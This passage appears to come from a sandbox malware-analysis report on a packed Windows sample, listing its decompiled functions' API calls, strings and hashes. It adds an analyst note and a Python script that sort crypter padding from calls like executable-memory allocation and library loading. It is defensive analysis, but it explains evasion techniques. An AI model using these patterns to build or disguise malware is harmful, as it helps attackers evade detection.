                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID:
                                                        • API String ID: 2579439406-0
                                                        • Opcode ID: bf13f82d5f95a5b9219731cc4d6641717ffd92efd21975278bd15d779f98045f
                                                        • Instruction ID: 1ba73b8f49e8f5d1db2b3cc3a21a518c391241100f22d2c72230a76073541b3b
                                                        • Opcode Fuzzy Hash: bf13f82d5f95a5b9219731cc4d6641717ffd92efd21975278bd15d779f98045f
                                                        • Instruction Fuzzy Hash: 7121FDBD811204EFD300DF64F9896493BB0FB1A300F22407AE948A76B1E7B4598ACF4D

                                                        Control-flow Graph (rendered graph not extracted; the executed/not-executed colouring is lost). Basic blocks and edges as emitted by the plugin:
                                                        control_flow_graph 258 402df0-403125 259 403127-40312c 258->259 260 403136-40313d 259->260 261 40312e-403134 259->261 262 403142 call 402ae0 260->262 261->259 261->260 263 403147-40314d 262->263 264 403152-40315c 263->264 265 403169-40316c 264->265 266 40315e-403167 GetCurrentDirectoryA 264->266 265->264 267 40316e-403175 265->267 266->265
                                                        APIs
                                                        • GetCurrentDirectoryA.KERNEL32(00000000,?,?,?,5C9ABF6F,1E034062,2035442F,53C07D34,782066B0,63C41FAC,0CB4B4DE,39A1128B,15DE494B,51091788,6E94626D,51091788), ref: 00403167
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory
                                                        • String ID: /D5 $K*w$l_H)
                                                        • API String ID: 1611563598-2127717106
                                                        • Opcode ID: 7ff80d827485dd1fbdc2d360fa7c585fdb13e0cb258b49fc037fd4da5eede4d1
                                                        • Instruction ID: e8bc9cc4fbe0acd5bef36109addc99e941147015c112cfba499ea01668a1ed68
                                                        • Opcode Fuzzy Hash: 7ff80d827485dd1fbdc2d360fa7c585fdb13e0cb258b49fc037fd4da5eede4d1
                                                        • Instruction Fuzzy Hash: 58A1CAB9E012589BCF04CFEAD9895DDFBB5FF18310F248108E812BBA14D3709A858F55
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00007303), ref: 0040734A
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 19311c34a9d4baa823216694b248ebb2eaa35a89abd0ded209ca0d3f4a86d0b4
                                                        • Instruction ID: 86083c40b31e47b7b7a57c8522e6a5e19468ab9a25b49b711df96938c8b9ed54
                                                        • Opcode Fuzzy Hash: 19311c34a9d4baa823216694b248ebb2eaa35a89abd0ded209ca0d3f4a86d0b4
                                                        • Instruction Fuzzy Hash: 179022A02000028AE30003300C0A00020800A08B02B02803A2880E0CA0EA300080B00A

                                                        Control-flow Graph (image not extracted)
                                                        APIs
                                                        • SetLastError.KERNEL32(00000000), ref: 00402AF7
                                                        • DefineDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00402B1F
                                                        • _malloc.LIBCMT ref: 00402B26
                                                        • _realloc.LIBCMT ref: 00402B30
                                                        • OpenJobObjectW.KERNEL32(00000000,00000000,nawis), ref: 00402B6A
                                                        • InterlockedIncrement.KERNEL32(?), ref: 00402B74
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00402BDE
                                                        • GetTickCount.KERNEL32 ref: 00402BF4
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00402C37
                                                        • LoadLibraryA.KERNEL32(00000000), ref: 00402C3E
                                                        • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00402C4E
                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402C88
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00402C90
                                                        • OpenEventW.KERNEL32(00000000,00000000,00000000), ref: 00402C9C
                                                        • GetCurrentProcess.KERNEL32 ref: 00402CC8
                                                        • GetCharWidth32A.GDI32(00000000,00000000,00000000,00000000), ref: 00402CD2
                                                        • GetLastError.KERNEL32 ref: 00402CF0
                                                        • GetFileAttributesA.KERNEL32(sayemexesukayevudadotukawakebal), ref: 00402D41
                                                        • GetShortPathNameA.KERNEL32(jowalaserenadecibaf,?,00000000), ref: 00402D51
                                                        • GlobalCompact.KERNEL32(00000000), ref: 00402D55
                                                        • GetEnvironmentStrings.KERNEL32 ref: 00402D57
                                                        • SetComputerNameW.KERNEL32(zodow), ref: 00402D62
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00402D77
                                                        • LoadLibraryA.KERNEL32(0044F9C8), ref: 00402DDA
                                                        • Note: in this function and in the one at 00402A0F above, most calls go to functionally unrelated APIs (number and time formatting, job objects, console aliases, named pipes, DOS devices, computer name) with every argument 00000000 or unknown, and the string constants are gibberish (sayemexesukayevudadotukawakebal, jowalaserenadecibaf, nawis, zodow). That pattern is consistent with crypter-inserted padding meant to inflate the import table and defeat API-sequence heuristics, so the individual calls should be read as noise rather than capabilities. Not everything here is padding, though: VirtualAlloc(00000000,?,00001000,00000040) requests a MEM_COMMIT region with PAGE_EXECUTE_READWRITE protection, and the LoadLibraryA calls are the usual way a loader stages its next layer; those are the calls worth following.
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$Exchange$ErrorLastLibraryLoadNameOpen$AllocAttributesCharCompactComputerConsoleCountCurrentDefineDeviceEnvironmentEventFileGlobalIncrementInputObjectPathProcessReadShortStringStringsTickVirtualWidth32_malloc_realloc
                                                        • String ID: %s %f %c$Bq $jowalaserenadecibaf$nawis$sayemexesukayevudadotukawakebal$zodow${
                                                        • API String ID: 2828681805-4159871415
                                                        • Opcode ID: b7bc834f5fd41e4760b8ab7829b546fb1a8d5297e328fe11c9040408e6bdcedb
                                                        • Instruction ID: 14f4dd021938527547b7e4df40446ce02b6bf67af537f9d54bbeee514953ad6b
                                                        • Opcode Fuzzy Hash: b7bc834f5fd41e4760b8ab7829b546fb1a8d5297e328fe11c9040408e6bdcedb
                                                        • Instruction Fuzzy Hash: 8F813BB1D00340EFE710AF74EE89B9A7B68FB14305F14443AE545772E2CAB85949CBAD
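The two entries above (00402A0F and 00402AF7) and the CRT handler entry at 0040B438 are the Joe Sandbox IDA plugin's own listings. The script below is an added example, not part of the report or of Joe Sandbox's tooling: it parses lines in the report's `Name.MODULE(args), ref: ADDR` and `String ID:` formats and applies an all-zero-argument heuristic to separate likely padding calls from calls worth following. The sample input is a constructed excerpt copied from those three entries; the heuristic, the `NOTABLE` set and the assumption that `$` separates the strings in a `String ID` field are this example's choices, not the sandbox's.

```python
"""Parse Joe Sandbox per-function 'APIs' / 'String ID' lines and flag padding calls.

Added example for this report page; not Joe Sandbox code. SAMPLE is a constructed
excerpt copied from three function entries on the page. The all-zero-argument
heuristic and the '$'-separator assumption for String ID are this example's, not
the sandbox's.
"""
import re
from collections import Counter

# Constructed sample input: lines in the report's own format.
SAMPLE = """\
• GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402A0F
• CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00402A15
• CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A5E
• GetTickCount.KERNEL32 ref: 00402BF4
• GetFileAttributesA.KERNEL32(sayemexesukayevudadotukawakebal), ref: 00402D41
• SetComputerNameW.KERNEL32(zodow), ref: 00402D62
• IsDebuggerPresent.KERNEL32 ref: 0040B438
• GetCurrentProcess.KERNEL32(C0000409), ref: 0040B474
• TerminateProcess.KERNEL32(00000000), ref: 0040B47B
• String ID: %s %f %c$Bq $jowalaserenadecibaf$nawis$sayemexesukayevudadotukawakebal$zodow${
"""

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR" (no argument list).
API_RE = re.compile(
    r"^(?:•\s*)?(?P<name>[\w@?:~]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
STRING_ID_RE = re.compile(r"^(?:•\s*)?String ID:\s*(?P<body>.*)$")

# APIs worth a second look when they appear with real arguments; analyst's choice.
NOTABLE = {"CreateProcessW", "VirtualAlloc", "LoadLibraryA", "IsDebuggerPresent",
           "TerminateProcess", "SetUnhandledExceptionFilter"}


def parse_api_line(line):
    """Return {'name', 'module', 'args', 'ref'} for an API bullet, else None."""
    m = API_RE.match(line.strip())
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def parse_string_id(line):
    """Split a 'String ID:' bullet into strings; assumes '$' is the separator."""
    m = STRING_ID_RE.match(line.strip())
    if not m:
        return None
    return [s for s in m.group("body").split("$") if s]


def is_padding_call(call):
    """Heuristic: two or more arguments, all literal zero or unknown ('?'),
    with at least one literal zero. Such calls to unrelated APIs are typical of
    crypter-inserted junk rather than real use of the API."""
    args = call["args"]
    if len(args) < 2:
        return False
    return all(a in ("00000000", "?") for a in args) and "00000000" in args


def summarize(text):
    """Parse a block of report lines and return a triage summary."""
    calls, strings = [], []
    for line in text.splitlines():
        call = parse_api_line(line)
        if call is not None:
            calls.append(call)
            continue
        found = parse_string_id(line)
        if found is not None:
            strings.extend(found)
    padding = [c for c in calls if is_padding_call(c)]
    return {
        "calls": calls,
        "padding": padding,
        "padding_ratio": len(padding) / len(calls) if calls else 0.0,
        "modules": Counter(c["module"] for c in calls),
        "notable": sorted({c["name"] for c in calls
                           if c["name"] in NOTABLE and not is_padding_call(c)}),
        "strings": strings,
    }


if __name__ == "__main__":
    s = summarize(SAMPLE)
    print(f"{len(s['calls'])} calls, {len(s['padding'])} look like padding "
          f"({s['padding_ratio']:.0%})")
    for c in s["padding"]:
        print(f"  padding: {c['name']} @ {c['ref']:08X}")
    print("notable:", ", ".join(s["notable"]))
    print("strings:", s["strings"])
```

Indented "Part of subcall function" bullets are deliberately not matched, so a summary reflects only the function's own calls. Argument values are whatever the plugin saw on the stack at the call site, so a single non-zero value on a no-parameter API (the C0000409 beside GetCurrentProcess) is not evidence of anything by itself; the heuristic therefore ignores calls with fewer than two arguments.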

                                                        Control-flow Graph (rendered graph not extracted; the executed/not-executed colouring is lost). Basic blocks and edges as emitted by the plugin:
                                                        control_flow_graph 147 403194-4031bd call 404609 150 403239-403243 147->150 151 4031bf-4031d0 call 403d8c 147->151 152 403245-403261 call 403dec 150->152 153 4031fc-403205 call 404609 150->153 159 4031d2-4031d5 151->159 160 40320a-40322a 151->160 162 403270-403279 152->162 163 403263-40326c 152->163 165 40333f 153->165 159->153 164 4031d7-4031da 159->164 166 40322c-403234 call 404510 160->166 170 403284-4032a5 call 403ea5 162->170 171 40327b-403282 162->171 167 4032e7 163->167 168 40326e 163->168 164->160 169 4031dc-4031f7 call 4044af 164->169 172 403342-403345 165->172 166->172 174 4032ed-403306 167->174 168->171 169->172 184 4032a6-4032b0 170->184 171->170 176 4032b5-4032ba 171->176 174->166 181 4032e0-4032e5 176->181 182 4032bc-4032de call 403d60 176->182 181->167 183 40330b-403310 181->183 182->184 186 403312-403325 call 403d60 183->186 187 403327-40333c call 403d60 call 404609 183->187 184->166 186->174 187->165
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: __ctrlfp__set_exp$__copysign__decomp__except2__umatherr
                                                        • String ID:
                                                        • API String ID: 2834391352-0
                                                        • Opcode ID: 092f6b4d6b20046c28fce046914ff99c7ebdd3a409ccf955a3c78dc936452d79
                                                        • Instruction ID: 32bb5e4a2de3f5fc311397bd84b74097e96737e5ff5a7b0edae0b3d6eed127e7
                                                        • Opcode Fuzzy Hash: 092f6b4d6b20046c28fce046914ff99c7ebdd3a409ccf955a3c78dc936452d79
                                                        • Instruction Fuzzy Hash: CE41D37140850AE6DB047F25EC4AA7B7E6CEF85305F2049AEF9D5A40C1EE398674835E

                                                        Control-flow Graph (rendered graph not extracted; the executed/not-executed colouring is lost). Basic blocks and edges as emitted by the plugin:
                                                        control_flow_graph 205 40a194-40a1af call 4053f4 call 407d9b 210 40a1b1-40a1b5 205->210 211 40a1ce-40a1e6 call 4048fc 205->211 210->211 213 40a1b7 210->213 216 40a1e8-40a1ea 211->216 217 40a21e-40a22a call 40a22f 211->217 215 40a1ba-40a1bc 213->215 218 40a1c6-40a1cd call 405439 215->218 219 40a1be-40a1c5 call 40563c 215->219 220 40a206-40a218 InterlockedIncrement 216->220 221 40a1ec-40a1f5 InterlockedDecrement 216->221 217->215 219->218 220->217 221->220 226 40a1f7-40a1fd 221->226 226->220 229 40a1ff-40a205 call 407275 226->229 229->220
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0040A1A0
                                                          • Part of subcall function 00407D9B: __getptd_noexit.LIBCMT ref: 00407D9E
                                                          • Part of subcall function 00407D9B: __amsg_exit.LIBCMT ref: 00407DAB
                                                        • __amsg_exit.LIBCMT ref: 0040A1C0
                                                        • __lock.LIBCMT ref: 0040A1D0
                                                        • InterlockedDecrement.KERNEL32(?), ref: 0040A1ED
                                                        • InterlockedIncrement.KERNEL32(022D1878), ref: 0040A218
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                        • String ID:
                                                        • API String ID: 4271482742-0
                                                        • Opcode ID: 5e8f35dabc685dccc16ba7a3a69a84647a7b758179c7feffaa6ddfdd5855884b
                                                        • Instruction ID: 6ce619eef8981f8b1ae415ca912ce3841918b27f7b0c59c687113e4e5a4dbb1b
                                                        • Opcode Fuzzy Hash: 5e8f35dabc685dccc16ba7a3a69a84647a7b758179c7feffaa6ddfdd5855884b
                                                        • Instruction Fuzzy Hash: 89015A31900B11ABDB20AF699849B5B72A0AF01754F04407AE8107B3E1CB386CA1DB9E

                                                        Control-flow Graph (rendered graph not extracted; the executed/not-executed colouring is lost). Basic blocks and edges as emitted by the plugin:
                                                        control_flow_graph 232 407275-407286 call 4053f4 235 407288-40728f 232->235 236 4072fd-407302 call 405439 232->236 238 407291-4072a9 call 4048fc call 40492f 235->238 239 4072d4 235->239 250 4072b4-4072c4 call 4072cb 238->250 251 4072ab-4072b3 call 40495f 238->251 242 4072d5-4072e5 HeapFree 239->242 242->236 244 4072e7-4072fc call 405b6a GetLastError call 405b28 242->244 244->236 250->236 257 4072c6-4072c9 250->257 251->250 257->242
                                                        APIs
                                                        • __lock.LIBCMT ref: 00407293
                                                          • Part of subcall function 004048FC: __mtinitlocknum.LIBCMT ref: 00404912
                                                          • Part of subcall function 004048FC: __amsg_exit.LIBCMT ref: 0040491E
                                                          • Part of subcall function 004048FC: EnterCriticalSection.KERNEL32(?,?,?,0040BBD5,00000004,00447678,0000000C,00409142,74DEDFA0,?,00000000,00000000,00000000,?,00407D4D,00000001), ref: 00404926
                                                        • ___sbh_find_block.LIBCMT ref: 0040729E
                                                        • ___sbh_free_block.LIBCMT ref: 004072AD
                                                        • HeapFree.KERNEL32(00000000,74DEDFA0,00447480,0000000C,004048DD,00000000,00447440,0000000C,00404917,74DEDFA0,?,?,0040BBD5,00000004,00447678,0000000C), ref: 004072DD
                                                        • GetLastError.KERNEL32(?,0040BBD5,00000004,00447678,0000000C,00409142,74DEDFA0,?,00000000,00000000,00000000,?,00407D4D,00000001,00000214), ref: 004072EE
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2714421763-0
                                                        • Opcode ID: ba8200ea433a492001e46b66f40bd743269361a4f72e1a255c6a746ad7319126
                                                        • Instruction ID: 80b134d7ac9c9eaedb2e3b0dfe896a216977181ecac5a5684c636fd801acfee0
                                                        • Opcode Fuzzy Hash: ba8200ea433a492001e46b66f40bd743269361a4f72e1a255c6a746ad7319126
                                                        • Instruction Fuzzy Hash: A2018F71D04705AADB207BB2AC0675F3A60EF01729F2041BFF404761E1CA7CA9809F6E

                                                        Control-flow Graph (rendered graph not extracted; the executed/not-executed colouring is lost). Basic blocks and edges as emitted by the plugin:
                                                        control_flow_graph 268 40904f-40905c GetModuleHandleA 269 409073 268->269 270 40905e-40906c GetProcAddress 268->270 273 409046-40904a 269->273 274 40904b-40904e 269->274 270->269 271 40906e-409072 270->271
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040476C), ref: 00409054
                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00409064
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                        • API String ID: 1646373207-3105848591
                                                        • Opcode ID: 69c6bfb2c1734e98e99d65c23525dc4cd92684a478a12a5edbe453cde73d28d8
                                                        • Instruction ID: c47841d6f15702497504f94e74aea390dd9ff62f7b27ea2c71da9afd6bd97b3b
                                                        • Opcode Fuzzy Hash: 69c6bfb2c1734e98e99d65c23525dc4cd92684a478a12a5edbe453cde73d28d8
                                                        • Instruction Fuzzy Hash: E7F03030B00A09D2DB101FB1BE0EAAF7A78BB80742F9105A1A1D2B00E5DF3885B1D74A

                                                        Control-flow Graph: function at 0040F928 (basic blocks 40f928 to 40fa3d; graph rendering and executed/not-executed legend not reproduced)
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040F95C
                                                        • __isleadbyte_l.LIBCMT ref: 0040F990
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000,00000020), ref: 0040F9C1
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,00000001,00000000,00000000,?,?,?,?,00000000,00000000,00000020), ref: 0040FA2F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0

                                                        Control-flow Graph: function at 00408F1A (basic blocks 408f1a to 408fa1; graph rendering and executed/not-executed legend not reproduced)
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0

                                                        Control-flow Graph: function at 0040A900 (basic blocks 40a900 to 40a968; graph rendering and executed/not-executed legend not reproduced)
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0040A90C
                                                          • Part of subcall function 00407D9B: __getptd_noexit.LIBCMT ref: 00407D9E
                                                          • Part of subcall function 00407D9B: __amsg_exit.LIBCMT ref: 00407DAB
                                                        • __getptd.LIBCMT ref: 0040A923
                                                        • __amsg_exit.LIBCMT ref: 0040A931
                                                        • __lock.LIBCMT ref: 0040A941
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                        • String ID:
                                                        • API String ID: 3521780317-0

                                                        Control-flow Graph: function at 00406000 (basic blocks 406000 to 406031; graph rendering and executed/not-executed legend not reproduced)
                                                        APIs
                                                        • __lock.LIBCMT ref: 00406011
                                                          • Part of subcall function 004048FC: __mtinitlocknum.LIBCMT ref: 00404912
                                                          • Part of subcall function 004048FC: __amsg_exit.LIBCMT ref: 0040491E
                                                          • Part of subcall function 004048FC: EnterCriticalSection.KERNEL32(?,?,?,0040BBD5,00000004,00447678,0000000C,00409142,74DEDFA0,?,00000000,00000000,00000000,?,00407D4D,00000001), ref: 00404926
                                                        • EnterCriticalSection.KERNEL32(<&@,?,004035DB,00000001,00000000,004473B8,0000000C,00402BB7,%s %f %c,0040263C,00000000,00000030), ref: 0040602A
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
                                                        • String ID: <&@
                                                        • API String ID: 3996875869-1731331922